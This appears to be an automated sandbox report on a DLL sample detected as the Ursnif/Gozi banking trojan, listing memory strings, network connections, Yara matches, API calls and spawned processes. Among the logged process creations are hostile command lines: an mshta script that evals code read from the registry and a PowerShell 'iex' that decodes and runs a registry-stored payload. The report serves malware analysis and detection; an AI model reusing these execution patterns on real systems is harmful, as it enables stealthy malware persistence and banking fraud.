          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
Source: unknown | HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree \cookie.ff
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree \cookie.ie
Yara detected Ursnif
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, EnableSPDY3_0 = 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_027734D0 NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_02774F73 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_027711A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0277B159 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05410D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05415E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0541C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05405E8A NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05422AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05414518 NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_054105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05408F6D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_054117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05422E10 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540E6C4 memset,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05403934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540F314 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05402A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_054235BC CreateProcessAsUserA
          Source: mu1rnx1a.dll.27.drStatic PE information: No import functions for PE file found
          Source: yacmzdf3.dll.30.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
          Source: C:\Windows\explorer.exeSection loaded: cryptdlg.dll
          Source: NJPcHPuRcG.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: NJPcHPuRcG.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027731DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
          Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.datJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{8AE918E3-61CB-4CED-3B5E-25409F722974}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_01
          Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{F653DE64-DD3A-98FE-178A-614C3B5E2540}
          Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMPJump to behavior
          Source: NJPcHPuRcG.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll (6 identical entries)
          Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: NJPcHPuRcG.dll Virustotal: Detection: 15%
          Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
          Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
          Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
          Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
          Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
          Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
          Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
          Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
          Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
